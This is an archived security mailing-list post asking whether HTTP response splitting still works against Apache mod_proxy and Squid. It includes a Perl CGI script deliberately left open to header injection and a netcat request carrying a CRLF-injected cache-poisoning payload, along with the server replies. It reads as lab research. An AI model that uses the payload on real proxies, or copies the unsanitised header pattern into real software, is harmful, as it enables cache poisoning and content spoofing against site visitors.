Http splitting working example

Hi list.

Hope somebody will spent some time on my question :),
or point me to the right list.

Is http splitting still works in fresh version of common applications
(squid, apache)?

I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attemt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_cache?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

--
Best regards.
Gleb Pakharenko.

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

Relevant Pages

  • Re: Http splitting working example
    ... However the problem were in my typo and apache ... In my cgi I've been performing redirect using: ... That breaks the whole idea to exploit http splitting. ... try specifying the Connection and Keep-Alive headers. ...
    (Pen-Test)
  • Re: bill gates claim about security vulnerabilities per LOC in Unix versus Windows
    ... > of how their systems work. ... the most common systems in use, but didn't the latest NetCraft survey ... we can agree that the absolute populations of ISS and Apache servers are ...
    (SecProg)
  • Re: Cant X be elemenated?
    ... > protocol, ... webserver api (netscape, IIS, apache 1.3, apache 2.0 all have different ... there do need to be common points, in the case of GUI's on *nix X is the ... send the line "unsubscribe linux-kernel" in ...
    (Linux-Kernel)
  • Re: Unable to view .cgi files
    ... CGI is a rather common type of graphic interface. ... A script is actually ...
    (microsoft.public.windowsxp.photos)
  • Re: Creating a category tree
    ... select boxes to place on the form. ... CGI is less common because it's noticeably more difficult to use. ... jmm dash list sohnen-moe com (Remove .AXSPAMGN for email). ...
    (comp.infosystems.www.authoring.html)